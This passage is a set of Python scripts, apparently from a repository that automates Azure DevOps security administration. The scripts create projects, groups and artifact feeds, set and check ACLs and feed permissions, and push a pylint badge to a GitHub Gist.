"C:\\Program Files\\Azure DevOps Server 2019\\Tools\\TFSSecurity.exe",
"/gc",
f"vstfs:///Classification/TeamProject/{ARGS.projectId}",
f"{ARGS.groupName}",
f"{ARGS.groupDescription}",
f"/collection:{ARGS.organization}",
]
CREATE_OUTPUT = subprocess.run(CMD, check=True, stdout=subprocess.PIPE).stdout.decode(
"utf-8"
)
print(f"[DEBUG] CREATE_OUTPUT: {CREATE_OUTPUT}")
|
kagarlickij/azuredevops-security-automation | common/set_permissions.py | """
This script sets the ACL
"""
import json
import argparse
import sys
import os
import time
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--namespaceId", type=str, required=True)
PARSER.add_argument("--projectId", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupSid", type=str, required=True)
PARSER.add_argument("--allow", type=str, required=True)
PARSER.add_argument("--deny", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
if ARGS.namespaceId == "2e9eb7ed-3c0a-47d4-87c1-0ffdd275fd87":
print("[INFO] Git namespace, adding `repoV2` to token..")
TOKEN = f"repoV2/{ARGS.projectId}"
elif ARGS.namespaceId == "52d39943-cb85-4d7f-8fa8-c6baac873819":
print(
"[INFO] Project namespace, adding `$PROJECT:vstfs:///Classification/TeamProject` to token.."
)
TOKEN = f"$PROJECT:vstfs:///Classification/TeamProject/{ARGS.projectId}"
elif ARGS.namespaceId == "d34d3680-dfe5-4cc6-a949-7d9c68f73cba":
print("[INFO] Analytics namespace, adding `$/Shared` to token..")
TOKEN = f"$/Shared/{ARGS.projectId}"
elif ARGS.namespaceId == "b7e84409-6553-448a-bbb2-af228e07cbeb":
print("[INFO] Library namespace, adding `Library/` to token..")
TOKEN = f"Library/{ARGS.projectId}"
else:
print("[INFO] standart format for token")
TOKEN = f"{ARGS.projectId}"
SID = os.environ[(ARGS.groupSid).upper()]
time.sleep(1)
URL = "{}/_apis/accesscontrollists/{}?token={}&api-version=5.0".format(
ARGS.organization, ARGS.namespaceId, TOKEN
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_ACL = RESPONSE.json()
ACE = {
"descriptor": f"Microsoft.TeamFoundation.Identity;{SID}",
"allow": f"{ARGS.allow}",
"deny": f"{ARGS.deny}",
}
if CURRENT_ACL["count"] == 0:
ACCESS_DICT = {f"Microsoft.TeamFoundation.Identity;{SID}": ACE}
else:
ACCESS_DICT = CURRENT_ACL["value"][0]["acesDictionary"]
ACCESS_DICT[f"Microsoft.TeamFoundation.Identity;{SID}"] = ACE
DESIRED_ACL = {
"count": 1,
"value": [
{
"inheritPermissions": "true",
"token": f"{TOKEN}",
"acesDictionary": ACCESS_DICT,
}
],
}
URL = "{}/_apis/accesscontrollists/{}?api-version=5.0".format(
ARGS.organization, ARGS.namespaceId
)
HEADERS = {
"Content-Type": "application/json",
}
print(f"[INFO] Setting permissions for {ARGS.groupName} group..")
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DESIRED_ACL), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 204:
print(
f"[INFO] Permissions for {ARGS.groupName} group have been set successfully"
)
else:
print(
f"##vso[task.logissue type=error] Permissions for {ARGS.groupName} group have not been set successfully"
)
sys.exit(1)
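# Example invocation (illustrative values; the namespaceId shown is the Git
# namespace handled above). Note that --groupSid is the *name* of an
# environment variable holding the SID, which is read via os.environ:
#   python common/set_permissions.py --organization https://dev.azure.com/myorg \
#       --namespaceId 2e9eb7ed-3c0a-47d4-87c1-0ffdd275fd87 --projectId <project guid> \
#       --groupName "Developers" --groupSid developersSid --allow 118 --deny 0 --pat <token>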
|
kagarlickij/azuredevops-security-automation | common/generate_pylint_badge.py | """
This script generates the pylint badge that is used in README.md
"""
import subprocess
import sys
import json
import argparse
import os
import requests
import anybadge
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--gistId", type=str, required=True)
PARSER.add_argument("--gitHubPat", type=str, required=True)
ARGS = PARSER.parse_args()
PYLINT_CMD = ["pylint --exit-zero ./**/*.py"]
PYLINT_OUTPUT = subprocess.run(
PYLINT_CMD, check=True, stdout=subprocess.PIPE, shell=True
).stdout.decode("utf-8")
PYLINT_SCORE = PYLINT_OUTPUT.split("at ", 1)[1].split("/", 1)[0]
print(f"[INFO] PYLINT_SCORE: {PYLINT_SCORE}")
ANYBADGE_THRESHOLDS = {2: "red", 4: "orange", 6: "yellow", 10: "green"}
BADGE = anybadge.Badge("pylint", PYLINT_SCORE, thresholds=ANYBADGE_THRESHOLDS)
BADGE.write_badge("pylint.svg")
# use a context manager so the handle is closed before the file is removed
with open("pylint.svg", "r") as SVG:
SVG_READ = SVG.read()
URL = "https://api.github.com/gists/{}".format(ARGS.gistId)
HEADERS = {"Authorization": f"token {ARGS.gitHubPat}"}
DATA = {
"description": "Created via API",
"files": {"pylint.svg": {"content": f"{SVG_READ}"}},
}
try:
RESPONSE = requests.patch(URL, headers=HEADERS, data=json.dumps(DATA))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
print("[INFO] SVG badge has been pushed to Gist successfully")
os.remove("pylint.svg")
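# Example invocation (illustrative values): the script runs pylint over the
# repo, renders pylint.svg, PATCHes it into the Gist, then removes the local file:
#   python common/generate_pylint_badge.py --gistId <gist id> --gitHubPat <github token>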
|
kagarlickij/azuredevops-security-automation | cloud/export_project_info.py | """
This script gets and exports Project ID and projectScopeDescriptor of the Azure DevOps project
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "https://dev.azure.com/{}/_apis/projects?api-version=5.0".format(
ARGS.organization
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
PROJECT_LIST = RESPONSE.json()["value"]
for PROJECT in PROJECT_LIST:
if PROJECT["name"] == ARGS.projectName:
PROJECT_ID = PROJECT["id"]
break
try:
PROJECT_ID
except NameError:
print("[ERROR] projectId has not been obtained")
sys.exit(1)
else:
print(f"[INFO] projectId = {PROJECT_ID}")
print(f"##vso[task.setvariable variable=projectId]{PROJECT_ID}")
URL = "https://vssps.dev.azure.com/{}/_apis/graph/descriptors/{}?api-version=5.0-preview.1".format(
ARGS.organization, PROJECT_ID
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
PROJECT_SCOPE_DESCRIPTOR = RESPONSE.json()["value"]
try:
PROJECT_SCOPE_DESCRIPTOR
except NameError:
print("[ERROR] projectScopeDescriptor has not been obtained")
sys.exit(1)
else:
print(f"[INFO] projectScopeDescriptor = {PROJECT_SCOPE_DESCRIPTOR}")
print(
f"##vso[task.setvariable variable=projectScopeDescriptor]{PROJECT_SCOPE_DESCRIPTOR}"
)
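# Example invocation (illustrative values; --organization is the bare
# organization name, since https://dev.azure.com/ is hard-coded above). The
# projectId and projectScopeDescriptor are exported as pipeline variables via
# the ##vso[task.setvariable] logging commands:
#   python cloud/export_project_info.py --organization myorg --projectName MyProject --pat <token>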
|
kagarlickij/azuredevops-security-automation | common/create_feed.py | """
This script creates a new Artifact feed
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str)
PARSER.add_argument("--feedName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
if not ARGS.projectName:
print("[INFO] no projectName received, so working with on-prem API")
URL = "{}/_apis/packaging/feeds?api-version=5.0-preview.1".format(ARGS.organization)
else:
print("[INFO] projectName received, so working with cloud API")
URL = "{}/{}/_apis/packaging/feeds?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
DATA = {
"name": f"{ARGS.feedName}",
"upstreamEnabled": "false",
"capabilities": "defaultCapabilities",
}
print(f"[INFO] Creating {ARGS.feedName} feed..")
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 201:
print(f"[INFO] Feed {ARGS.feedName} has been created successfully")
else:
print(
f"##vso[task.logissue type=error] Feed {ARGS.feedName} has not been created"
)
sys.exit(1)
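# Example invocation (illustrative values; omitting --projectName selects the
# on-prem, collection-scoped API as handled above):
#   python common/create_feed.py --organization https://dev.azure.com/myorg \
#       --projectName MyProject --feedName my-feed --pat <token>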
|
kagarlickij/azuredevops-security-automation | common/set_feed_permissions.py | <filename>common/set_feed_permissions.py
"""
This script sets the ACL for an Artifact feed
"""
import json
import argparse
import sys
import os
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--feedId", type=str, required=True)
PARSER.add_argument("--projectName", type=str)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupSid", type=str, required=True)
PARSER.add_argument("--role", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
SID = os.environ[(ARGS.groupSid).upper()]
if not ARGS.projectName:
print("[INFO] no projectName received, so working with on-prem API")
URL = "{}/_apis/packaging/Feeds/{}/permissions?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.feedId
)
else:
print("[INFO] projectName received, so working with cloud API")
URL = "{}/{}/_apis/packaging/Feeds/{}/permissions?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectName, ARGS.feedId
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_ACL = RESPONSE.json()
ACCESS_DICT = CURRENT_ACL["value"][0]
ACE = {
"role": f"{ARGS.role}",
"identityDescriptor": f"Microsoft.TeamFoundation.Identity;{SID}",
"displayName": "None",
"isInheritedRole": "False",
}
DESIRED_ACL = [ACE]
print(f"[INFO] Setting permissions for {ARGS.groupName} group..")
try:
RESPONSE = requests.patch(
URL, headers=HEADERS, data=json.dumps(DESIRED_ACL), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 200:
print(
f"[INFO] Permissions for {ARGS.groupName} group have been set successfully"
)
else:
print(
f"##vso[task.logissue type=error] Permissions for {ARGS.groupName} group have not been set successfully"
)
sys.exit(1)
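# Example invocation (illustrative values; --role is one of the Azure DevOps
# feed roles, e.g. "reader", "contributor" or "administrator"):
#   python common/set_feed_permissions.py --organization https://dev.azure.com/myorg \
#       --projectName MyProject --feedId <feed guid> --groupName "Developers" \
#       --groupSid developersSid --role contributor --pat <token>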
|
kagarlickij/azuredevops-security-automation | onprem/get_group_members.py | <filename>onprem/get_group_members.py
"""
This script gets the current quantity of group members and compares it with the desired quantity
"""
import subprocess
import argparse
import sys
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--desiredMembersQuantity", type=str, required=True)
ARGS = PARSER.parse_args()
CMD = [
"C:\\Program Files\\Azure DevOps Server 2019\\Tools\\TFSSecurity.exe",
"/imx",
f"[{ARGS.projectName}]\\{ARGS.groupName}",
f"/collection:{ARGS.organization}",
]
CURRENT_MEMBERS_OUTPUT = subprocess.run(
CMD, check=True, stdout=subprocess.PIPE
).stdout.decode("utf-8")
CURRENT_MEMBERS_LINE = ""
for LINE in CURRENT_MEMBERS_OUTPUT.splitlines():
if "member(s):" in LINE:
CURRENT_MEMBERS_LINE = LINE
break
if CURRENT_MEMBERS_LINE == "":
CURRENT_MEMBERS_QUANTITY = "0"
else:
CURRENT_MEMBERS_QUANTITY = CURRENT_MEMBERS_LINE.split(" ")[0]
print(f"[DEBUG] CURRENT_MEMBERS_QUANTITY: {CURRENT_MEMBERS_QUANTITY}")
if int(CURRENT_MEMBERS_QUANTITY) == int(ARGS.desiredMembersQuantity):
print("[INFO] Current members quantity match desired")
else:
print(
"##vso[task.logissue type=error] Current members quantity does not match desired"
)
print(
f"##vso[task.logissue type=error] Desired members quantity = {ARGS.desiredMembersQuantity}"
)
print(
f"##vso[task.logissue type=error] Current members quantity = {CURRENT_MEMBERS_QUANTITY}"
)
print(f"##vso[task.logissue type=error] Current members = {CURRENT_MEMBERS_OUTPUT}")
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/create_tmp_release_pipeline.py | """
This script creates a temporary Release pipeline
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
print("[INFO] Creating tmp Release pipeline..")
URL = "{}/{}/_apis/release/definitions?api-version=5.0".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
DATA = {
"source": "undefined",
"revision": 1,
"description": "null",
"createdBy": "null",
"createdOn": "0001-01-01T00:00:00",
"modifiedBy": "null",
"modifiedOn": "0001-01-01T00:00:00",
"isDeleted": "false",
"variables": {},
"variableGroups": [],
"environments": [
{
"id": 0,
"name": "Stage 1",
"rank": 1,
"variables": {},
"variableGroups": [],
"preDeployApprovals": {
"approvals": [
{
"rank": 1,
"isAutomated": "true",
"isNotificationOn": "false",
"id": 1,
}
],
"approvalOptions": {
"requiredApproverCount": "null",
"releaseCreatorCanBeApprover": "false",
"autoTriggeredAndPreviousEnvironmentApprovedCanBeSkipped": "false",
"enforceIdentityRevalidation": "false",
"timeoutInMinutes": 0,
"executionOrder": "beforeGates",
},
},
"deployStep": {"id": 2},
"postDeployApprovals": {
"approvals": [
{
"rank": 1,
"isAutomated": "true",
"isNotificationOn": "false",
"id": 3,
}
],
"approvalOptions": {
"requiredApproverCount": "null",
"releaseCreatorCanBeApprover": "false",
"autoTriggeredAndPreviousEnvironmentApprovedCanBeSkipped": "false",
"enforceIdentityRevalidation": "false",
"timeoutInMinutes": 0,
"executionOrder": "afterSuccessfulGates",
},
},
"deployPhases": [
{
"deploymentInput": {
"parallelExecution": {"parallelExecutionType": "none"},
"timeoutInMinutes": 0,
"jobCancelTimeoutInMinutes": 1,
"condition": "succeeded()",
"overrideInputs": {},
},
"rank": 1,
"phaseType": "runOnServer",
"name": "Agentless job",
"refName": "null",
"workflowTasks": [],
}
],
"environmentOptions": {
"emailNotificationType": "OnlyOnFailure",
"emailRecipients": "release.environment.owner;release.creator",
"skipArtifactsDownload": "false",
"timeoutInMinutes": 0,
"enableAccessToken": "false",
"publishDeploymentStatus": "true",
"badgeEnabled": "false",
"autoLinkWorkItems": "false",
"pullRequestDeploymentEnabled": "false",
},
"demands": [],
"conditions": [
{"name": "ReleaseStarted", "conditionType": "event", "value": ""}
],
"executionPolicy": {"concurrencyCount": 1, "queueDepthCount": 0},
"schedules": [],
"retentionPolicy": {
"daysToKeep": 30,
"releasesToKeep": 3,
"retainBuild": "true",
},
"processParameters": {},
"properties": {
"BoardsEnvironmentType": {
"$type": "System.String",
"$value": "unmapped",
},
"LinkBoardsWorkItems": {"$type": "System.String", "$value": "False"},
},
"preDeploymentGates": {"id": 0, "gatesOptions": "null", "gates": []},
"postDeploymentGates": {"id": 0, "gatesOptions": "null", "gates": []},
"environmentTriggers": [],
}
],
"artifacts": [],
"triggers": [],
"releaseNameFormat": "Release-$(rev:r)",
"tags": [],
"properties": {
"DefinitionCreationSource": {"$type": "System.String", "$value": "ReleaseNew"},
"IntegrateBoardsWorkItems": {"$type": "System.String", "$value": "False"},
"IntegrateJiraWorkItems": {"$type": "System.String", "$value": "false"},
},
"name": "tmp",
"path": "\\",
"projectReference": "null",
"_links": {},
}
try:
RESPONSE = requests.post(
URL, headers=HEADERS, data=json.dumps(DATA), auth=(ARGS.pat, "")
)
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 200:
print("[INFO] tmp Release pipeline has been created successfully")
else:
print(
"##vso[task.logissue type=error] tmp Release pipeline has not been created"
)
sys.exit(1)
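# Example invocation (illustrative values): creates a release definition named
# "tmp" with a single agentless stage, intended to be cleaned up afterwards by
# delete_tmp_release_pipeline.py:
#   python common/create_tmp_release_pipeline.py --organization https://dev.azure.com/myorg \
#       --projectName MyProject --pat <token>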
|
kagarlickij/azuredevops-security-automation | common/delete_tmp_release_pipeline.py | <reponame>kagarlickij/azuredevops-security-automation
"""
This script deletes the temporary Release pipeline
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
print("[INFO] Deleting tmp Release pipeline..")
URL = "{}/{}/_apis/release/definitions/1?api-version=5.0".format(
ARGS.organization, ARGS.projectName
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.delete(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
RESPONSE_CODE = RESPONSE.status_code
if RESPONSE_CODE == 204:
print("[INFO] tmp Release pipeline has been deleted successfully")
else:
print(
"##vso[task.logissue type=error] tmp Release pipeline has not been deleted"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | onprem/get_groups.py | <gh_stars>1-10
"""
This script gets the list of current groups and compares it with the list of desired groups
"""
import subprocess
import argparse
import sys
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectId", type=str, required=True)
PARSER.add_argument("--desiredGroupsList", nargs="+", required=True)
ARGS = PARSER.parse_args()
CMD = [
"C:\\Program Files\\Azure DevOps Server 2019\\Tools\\TFSSecurity.exe",
"/g",
f"vstfs:///Classification/TeamProject/{ARGS.projectId}",
f"/collection:{ARGS.organization}",
]
LIST_GROUPS_OUTPUT = subprocess.run(
CMD, check=True, stdout=subprocess.PIPE
).stdout.decode("utf-8")
CURRENT_GROUPS_LIST = list()
for LINE in LIST_GROUPS_OUTPUT.splitlines():
if "Display name" in LINE:
GROUP_NAME = LINE.split("\\")[1]
CURRENT_GROUPS_LIST.append(GROUP_NAME)
print(f"[DEBUG] CURRENT_GROUPS_LIST: {CURRENT_GROUPS_LIST}")
DESIRED_GROUPS_LIST = ARGS.desiredGroupsList
DESIRED_GROUPS_LIST.sort()
CURRENT_GROUPS_LIST.sort()
if CURRENT_GROUPS_LIST == DESIRED_GROUPS_LIST:
print("[INFO] Current list of groups match desired")
else:
print(
"##vso[task.logissue type=error] Current list of groups does not match desired"
)
print(f"##vso[task.logissue type=error] currentGroupsList = {CURRENT_GROUPS_LIST}")
print(f"##vso[task.logissue type=error] desiredGroupsList = {DESIRED_GROUPS_LIST}")
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | onprem/delete_group.py | <reponame>kagarlickij/azuredevops-security-automation<gh_stars>1-10
"""
This script deletes a group in the project via the TFSSecurity cmd
"""
import subprocess
import argparse
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--groupName", type=str, required=True)
ARGS = PARSER.parse_args()
CMD = [
"C:\\Program Files\\Azure DevOps Server 2019\\Tools\\TFSSecurity.exe",
"/gd",
f"[{ARGS.projectName}]\\{ARGS.groupName}",
f"/collection:{ARGS.organization}",
]
DELETE_OUTPUT = subprocess.run(CMD, check=True, stdout=subprocess.PIPE).stdout.decode(
"utf-8"
)
print(f"[DEBUG] DELETE_OUTPUT: {DELETE_OUTPUT}")
|
kagarlickij/azuredevops-security-automation | cloud/get_groups.py | <reponame>kagarlickij/azuredevops-security-automation<filename>cloud/get_groups.py
"""
This script gets the list of current groups and compares it with the list of desired groups
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectScopeDescriptor", type=str, required=True)
PARSER.add_argument("--desiredGroupsList", nargs="+", required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
DESIRED_GROUPS_LIST = ARGS.desiredGroupsList
URL = "{}/_apis/graph/groups?scopeDescriptor={}&api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectScopeDescriptor
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_GROUPS_LIST = []
GROUPS = RESPONSE.json()["value"]
for GROUP in GROUPS:
groupDisplayName = GROUP["displayName"]
CURRENT_GROUPS_LIST.append(groupDisplayName)
DESIRED_GROUPS_LIST.sort()
CURRENT_GROUPS_LIST.sort()
if CURRENT_GROUPS_LIST == DESIRED_GROUPS_LIST:
print("[INFO] Current list of groups match desired")
else:
print(
"##vso[task.logissue type=error] Current list of groups does not match desired"
)
print(
f"##vso[task.logissue type=error] currentGroupsList = {CURRENT_GROUPS_LIST}"
)
print(
f"##vso[task.logissue type=error] desiredGroupsList = {DESIRED_GROUPS_LIST}"
)
sys.exit(1)
|
kagarlickij/azuredevops-security-automation | common/check_feed_permissions.py | <gh_stars>1-10
"""
This script gets the current ACL of the Artifact feed and compares it with the desired ACL
"""
import json
import argparse
import sys
import os
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--feedId", type=str, required=True)
PARSER.add_argument("--projectName", type=str)
PARSER.add_argument("--groupName", type=str, required=True)
PARSER.add_argument("--groupSid", type=str, required=True)
PARSER.add_argument("--role", type=str, required=True)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
SID = os.environ[(ARGS.groupSid).upper()]
DESCRIPTOR = f"Microsoft.TeamFoundation.Identity;{SID}"
if not ARGS.projectName:
print("[INFO] no projectName received, so working with on-prem API")
URL = "{}/_apis/packaging/Feeds/{}/permissions?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.feedId
)
else:
print("[INFO] projectName received, so working with cloud API")
URL = "{}/{}/_apis/packaging/Feeds/{}/permissions?api-version=5.0-preview.1".format(
ARGS.organization, ARGS.projectName, ARGS.feedId
)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
CURRENT_ACL = RESPONSE.json()["value"]
for IDENTITY in CURRENT_ACL:
if IDENTITY["identityDescriptor"] == DESCRIPTOR:
CURRENT_ROLE = IDENTITY["role"]
break
try:
CURRENT_ROLE
except NameError:
print(f"##vso[task.logissue type=error] Group {ARGS.groupName} was not found")
sys.exit(1)
else:
print(f"[INFO] Checking {ARGS.groupName} group permissions..")
if CURRENT_ROLE == ARGS.role:
print("[INFO] Current permissions match desired")
else:
print(
"##vso[task.logissue type=error] Current permissions do not match desired"
)
print(f"##vso[task.logissue type=error] Desired permissions = {ARGS.role}")
print(
f"##vso[task.logissue type=error] Current permissions = {CURRENT_ROLE}"
)
sys.exit(1)
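# Example invocation (illustrative values): the script exits non-zero on a
# mismatch, which makes it usable as a verification gate in a pipeline:
#   python common/check_feed_permissions.py --organization https://dev.azure.com/myorg \
#       --projectName MyProject --feedId <feed guid> --groupName "Developers" \
#       --groupSid developersSid --role contributor --pat <token>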
|
kagarlickij/azuredevops-security-automation | common/create_project.py | """
This script creates a new Azure DevOps project
"""
import json
import argparse
import sys
import requests
PARSER = argparse.ArgumentParser()
PARSER.add_argument("--organization", type=str, required=True)
PARSER.add_argument("--projectName", type=str, required=True)
PARSER.add_argument("--projectDescription", type=str, required=False)
PARSER.add_argument(
"--processTemplate", type=str, default="6b724908-ef14-45cf-84f8-768b5384da45"
)
PARSER.add_argument("--pat", type=str, required=True)
ARGS = PARSER.parse_args()
URL = "{}/_apis/projects?api-version=5.0".format(ARGS.organization)
HEADERS = {
"Content-Type": "application/json",
}
try:
RESPONSE = requests.get(URL, headers=HEADERS, auth=(ARGS.pat, ""))
RESPONSE.raise_for_status()
except requests.exceptions.RequestException as err:
print(f"##vso[task.logissue type=error] {err}")
RESPONSE_TEXT = json.loads(RESPONSE.text)
CODE = RESPONSE_TEXT["errorCode"]
MESSAGE = RESPONSE_TEXT["message"]
print(f"##vso[task.logissue type=error] Response code: {CODE}")
print(f"##vso[task.logissue type=error] Response message: {MESSAGE}")
sys.exit(1)
else:
PROJECTS = RESPONSE.json()["value"]
for PROJECT in PROJECTS:
if PROJECT["name"] == ARGS.projectName:
print(
f"##vso[task.logissue type=error] project {ARGS.projectName} already exists"
)
sys.exit(1)
print(f"[INFO] project {ARGS.projectName} does not exist yet, ok to proceed")
print(f"[INFO] Creating {ARGS.projectName} project..")
URL = "{}/_apis/projects?api-version=5.0".format(ARGS.organization)
HEADERS = {
"Content-Type": "application/json",
}
DATA = {
